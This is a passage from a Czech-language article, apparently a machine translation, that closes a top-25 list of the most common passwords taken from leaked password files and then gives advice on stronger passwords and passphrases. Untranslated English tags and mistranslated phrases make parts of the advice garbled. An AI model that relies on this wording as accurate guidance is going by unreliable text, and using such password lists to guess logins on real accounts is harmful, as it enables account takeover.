20) 12345 (nový) 21) password1 (až 4) 22) princezna (New) 23 ) azerty (New) 24) trustno1 (Down 12) 25) 000000 (New) Tento top 25 list byl sestaven ze souborů, které obsahují miliony ukradených hesel vyslaných on-line v průběhu předchozího roku. Společnost radí spotřebitelům nebo podnikům pomocí některé z hesel v seznamu je okamžitě změnit, a navrhuje, aby hesla bezpečnější s těmito tipy: Používejte hesla osm znaků nebo více smíšených typů postav. Ale i hesla se společnými substituce jako "dr4mat1c" mohou být ohroženy stále více sofistikované technologie útočníků, a náhodné kombinace jako "j% 7K & yPx $", může být obtížné pamatovat. Jeden způsob, jak vytvářet bezpečná hesla, která jsou snadno k odběru je na použití přístupových frází - krátká slova s mezerami nebo jinými znaky jejich separačních. To je nejlepší používat náhodná slova spíše než obyčejné f